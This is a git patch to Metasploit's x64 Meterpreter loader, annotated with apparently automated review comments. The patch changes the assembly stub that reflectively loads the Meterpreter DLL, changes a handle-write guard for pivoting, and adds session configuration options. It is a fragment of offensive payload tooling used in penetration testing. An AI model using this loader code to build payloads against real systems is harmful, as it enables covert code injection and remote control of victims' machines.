From 4ec87985a22ad80f29aaf1181aeafabe9a5c235c Mon Sep 17 00:00:00 2001
From: OJ
Date: Mon, 7 Aug 2017 20:01:57 +1000
Subject: [PATCH] Fix stager crash and support pivots in x64 meterp loader
---
 .../payload/windows/x64/meterpreter_loader.rb | 20 ++++++++++---------
 1 file changed, 11 insertions(+), 9 deletions(-)
diff --git a/lib/msf/core/payload/windows/x64/meterpreter_loader.rb b/lib/msf/core/payload/windows/x64/meterpreter_loader.rb
index ba0de42a19..1489e9f4e5 100644
--- a/lib/msf/core/payload/windows/x64/meterpreter_loader.rb
+++ b/lib/msf/core/payload/windows/x64/meterpreter_loader.rb
@@ -42,19 +42,20 @@ module Payload::Windows::MeterpreterLoader_x64
 push rbp ; save rbp
 mov rbp, rsp ; set up a new stack frame
 sub rsp, 32 ; allocate some space for calls.
+ and rsp, ~0xF ; Ensure RSP is 16 byte aligned
 ; GetPC
 call $+5 ; relative call to get location
 pop rbx ; pop return value
 ; Invoke ReflectiveLoader()
 ; add the offset to ReflectiveLoader()
- add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)}
+ add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)}
 call rbx ; invoke ReflectiveLoader()
 ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
 ; offset from ReflectiveLoader() to the end of the DLL
 add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
 ^
- unless opts[:stageless]
+ unless opts[:stageless] || opts[:force_write_handle] == true
 asm << %Q^
 ; store the comms socket or handle
 mov [rbx], rdi
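Review bot: The constant in `add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)}` is a hand-maintained byte count tied to the length of the stub before `pop rbx`; the bump from 0x11 to 0x15 matches the four-byte encoding of the inserted `and rsp, ~0xF`, but nothing in the hunk records that coupling, so the next instruction added above the GetPC will silently misplace the ReflectiveLoader() call. Suggest a comment next to the `and` line such as `; NOTE: instructions added before the GetPC call change the stub length; adjust the 0x15 subtracted from rdi_offset below to match`. The new `opts[:force_write_handle]` guard reads oddly against its name: when it is `true` the `mov [rbx], rdi` store is skipped, not forced, so unless the handle is written elsewhere in the method (outside this hunk) a one-line comment explaining the intent for the pivot case the commit title mentions is needed. Note also that this guard uses bare `opts[:stageless]` while the config block in the second hunk uses `opts[:stageless] == true`, so a truthy non-boolean value is treated differently by the two. The enclosing method and the `%Q^` string begin and end outside the hunk.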
@@ -79,13 +80,14 @@ module Payload::Windows::MeterpreterLoader_x64
 # create the configuration block, which for staged connections is really simple.
 config_opts = {
- arch: opts[:uuid].arch,
- exitfunk: ds['EXITFUNC'],
- expiration: ds['SessionExpirationTimeout'].to_i,
- uuid: opts[:uuid],
- transports: opts[:transport_config] || [transport_config(opts)],
- extensions: [],
- stageless: opts[:stageless] == true
+ arch: opts[:uuid].arch,
+ null_session_guid: opts[:null_session_guid] == true,
+ exitfunk: ds[:exit_func] || ds['EXITFUNC'],
+ expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
+ uuid: opts[:uuid],
+ transports: opts[:transport_config] || [transport_config(opts)],
+ extensions: [],
+ stageless: opts[:stageless] == true
 }
 # create the configuration instance based off the parameters
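Review bot: `ds` is now read with both symbol keys (`ds[:exit_func]`, `ds[:expiration]`) and string keys (`ds['EXITFUNC']`, `ds['SessionExpirationTimeout']`) with nothing saying why; presumably `ds` is either the module datastore (string keys) or a caller-supplied hash on the pivot path (symbol keys), and that contract belongs in a comment above `config_opts = {`, e.g. `# ds is the module datastore (string keys) or an options hash from a pivot caller (symbol keys); the symbol form wins`. With two sources feeding `expiration`, a missing value still collapses to `nil.to_i == 0` without any signal; that is pre-existing, but a misconfigured pivot caller now hits the same silent fallback, so `Integer(ds[:expiration] || ds['SessionExpirationTimeout'])` or an explicit presence check would surface it. The new `null_session_guid` option is likewise undocumented in this hunk. The enclosing method begins and ends outside the hunk.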